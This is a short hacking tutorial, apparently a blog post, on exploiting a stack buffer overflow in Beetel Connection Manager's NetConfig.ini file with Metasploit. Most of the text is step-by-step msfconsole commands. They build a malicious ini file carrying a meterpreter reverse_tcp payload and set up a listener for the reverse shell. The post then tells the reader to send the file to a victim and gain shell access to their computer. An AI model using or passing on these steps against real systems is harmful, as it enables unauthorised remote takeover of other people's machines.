Categories

Archives

Kali Linux, Penetration Testing

Hack Remote PC Using Beetel Connection Manager Net Config.ini Buffer Overflow

This module exploits a stack-based buffer overflow on Beetel Connection Manager. The vulnerability exists in the parising of the UserName parameter in the NetConfig.ini file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP SP3 and Windows 7 SP1.b

Exploit Targets

Windows XP SP 3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/beetel_netconfig_ini_bof

msf exploit (beetel_netconfig_ini_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (beetel_netconfig_ini_bof)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (beetel_netconfig_ini_bof)>exploit

After we successfully generate the malicious ini File, it will stored on your local computer

/root/.msf4/local/netconfig.ini

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your netconfig.ini files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.